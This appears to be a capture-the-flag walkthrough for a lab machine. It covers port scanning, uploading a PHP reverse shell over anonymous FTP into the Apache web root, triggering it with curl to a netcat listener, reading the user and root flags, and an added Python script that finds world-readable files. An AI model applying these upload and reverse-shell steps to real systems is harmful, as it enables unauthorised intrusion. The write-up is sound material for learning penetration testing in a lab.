Hacker learning...

1. Port and service scan:

┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.131
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-25 14:00 CST
Nmap scan report for 192.168.56.131
Host is up (0.00048s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
|_ftp-bounce: bounce working!
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 10725 Feb 23 15:26 index.html
25/tcp open tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.54 (Debian)
110/tcp open tcpwrapped

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.87 seconds

2. Port 80 is open; visit the web page:


It is only the default Apache page. The scan already gave the important hint, though: anonymous FTP login is allowed, and the FTP root contains index.html (10725 bytes), the same file Apache serves (dirsearch reports /index.html as 10KB), so the FTP root is very likely the web document root. nmap also reports ftp-bounce as working, i.e. the ProFTPD server accepts PORT commands pointing at third-party addresses.

3. After enumeration: consider uploading a PHP shell (getshell.php) through anonymous FTP and executing it through Apache.

┌──(root㉿kali)-[/home/ace]
└─# dirsearch -u http://192.168.56.131/

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.131/-_23-07-25_14-18-04.txt

Error Log: /root/.dirsearch/logs/errors-23-07-25_14-18-04.log

Target: http://192.168.56.131/

[14:18:04] Starting:
[14:18:05] 403 - 279B - /.ht_wsr.txt
[14:18:05] 403 - 279B - /.htaccess.bak1
[14:18:05] 403 - 279B - /.htaccess.orig
[14:18:05] 403 - 279B - /.htaccess.save
[14:18:05] 403 - 279B - /.htaccess_orig
[14:18:05] 403 - 279B - /.htaccess_extra
[14:18:05] 403 - 279B - /.htaccess.sample
[14:18:05] 403 - 279B - /.htaccess_sc
[14:18:05] 403 - 279B - /.htaccessOLD
[14:18:05] 403 - 279B - /.htaccessOLD2
[14:18:05] 403 - 279B - /.htaccessBAK
[14:18:05] 403 - 279B - /.html
[14:18:05] 403 - 279B - /.htm
[14:18:05] 403 - 279B - /.htpasswd_test
[14:18:05] 403 - 279B - /.httr-oauth
[14:18:05] 403 - 279B - /.htpasswds
[14:18:06] 403 - 279B - /.php
[14:18:29] 200 - 10KB - /index.html
[14:18:41] 403 - 279B - /server-status
[14:18:41] 403 - 279B - /server-status/

Upload over FTP (anonymous login, any string accepted as the password):

┌──(root㉿kali)-[/usr/share/laudanum/php]
└─# ftp 192.168.56.131
Connected to 192.168.56.131.
220 ProFTPD Server (friendly) [::ffff:192.168.56.131]
Name (192.168.56.131:ace): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Upload the shell (rece.php, a PHP reverse shell whose callback address is the attacker machine, 192.168.56.127:1234, as the listener output shows):

ftp> put rece.php
local: rece.php remote: rece.php
229 Entering Extended Passive Mode (|||57118|)
150 Opening BINARY mode data connection for rece.php
100% |*****************************************************************************************************| 5496 21.74 MiB/s 00:00 ETA
226 Transfer complete
5496 bytes sent in 00:00 (2.16 MiB/s)
ftp>

Now we only need to listen with Netcat and trigger the reverse shell. Start the listener first, with nc -nlvp 1234 in one terminal, then request the uploaded file in another with curl http://$ip/rece.php (or load the URL directly in the browser). curl will not return while the shell is alive, because the PHP script keeps the connection open.

Reverse shell received (a bare /bin/sh without a tty; it can be upgraded with python3 -c 'import pty; pty.spawn("/bin/bash")' if needed):

┌──(root㉿kali)-[/home/ace]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.56.127] from (UNKNOWN) [192.168.56.131] 54870
Linux friendly 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 GNU/Linux
02:40:36 up 41 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Get user.txt:

/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ cd home
$ ls
RiJaba1
$ cd RiJaba1
$ ls
CTF
Private
YouTube
user.txt
$ cat user.txt
b8cff8c9008e1c98a1f2937b4475acd6
$

4. Getting root.txt (no sudo needed): search for the flag from the www-data shell. The first command fails because of the missing space between / and -name; the corrected find shows two copies, and the one under /var/log/apache2 is readable without any privilege escalation:

find /-name root.txt
find: '/-name': No such file or directory
root.txt
find / -name root.txt
/var/log/apache2/root.txt
/root/root.txt
cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f
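The root flag fell here not to an exploit but to a misplaced copy of root.txt with a permissive mode under /var/log/apache2. Rather than guessing file names with find -name, the following added example (not part of the write-up) walks the given directories and reports regular files that are readable by "others" yet owned by a different uid than the caller, which is the class of leak that exposed the flag. The directory list in main and the demo tree are assumptions; demo_tree() builds a constructed sample so the scan can be tried without a target.

```python
#!/usr/bin/env python3
"""Added example: list files under the given roots that are other-readable
(mode bit S_IROTH) but owned by someone other than the calling user.
Not part of the original post; the default roots are assumptions."""
import os
import stat
import sys
import tempfile


def exposed_files(roots, caller_uid, name_filter=None):
    """Yield (path, owner_uid, mode_string) for regular files under roots that
    grant read to 'others' and are not owned by caller_uid.

    Symlinks are not followed and unreadable directories are skipped, which
    is what happens when an unprivileged account such as www-data walks /."""
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
            for fn in filenames:
                if name_filter and not name_filter(fn):
                    continue
                path = os.path.join(dirpath, fn)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # entry vanished or is not stat-able
                if not stat.S_ISREG(st.st_mode):
                    continue  # skip symlinks, sockets, devices
                if st.st_uid == caller_uid:
                    continue  # our own files are not a leak
                if st.st_mode & stat.S_IROTH:
                    yield path, st.st_uid, stat.filemode(st.st_mode)


def someone_else(uid):
    """A uid different from uid, to stand in for an unprivileged caller."""
    return 65534 if uid != 65534 else 65533


def demo_tree():
    """Constructed sample tree: one world-readable and one private file.
    Returns (directory, readable_path, private_path, owner_uid)."""
    d = tempfile.mkdtemp(prefix="exposed-demo-")
    readable = os.path.join(d, "root.txt")
    private = os.path.join(d, "secret.txt")
    for p in (readable, private):
        with open(p, "w") as fh:
            fh.write("flag\n")
    os.chmod(readable, 0o644)  # -rw-r--r--: anyone can read it
    os.chmod(private, 0o600)   # -rw-------: owner only
    return d, readable, private, os.getuid()


if __name__ == "__main__":
    # Assumed starting points; pass your own on the command line.
    roots = sys.argv[1:] or ["/var/log", "/var/www", "/home", "/opt", "/tmp"]
    for path, uid, mode in exposed_files(roots, os.getuid(),
                                         lambda n: n.endswith(".txt")):
        print(f"{mode} uid={uid} {path}")
```

Running it as www-data with the default roots would have listed /var/log/apache2/root.txt (owned by root, readable by others) without knowing the name in advance; dropping the name filter turns it into a general survey of what the web user can read outside its own files.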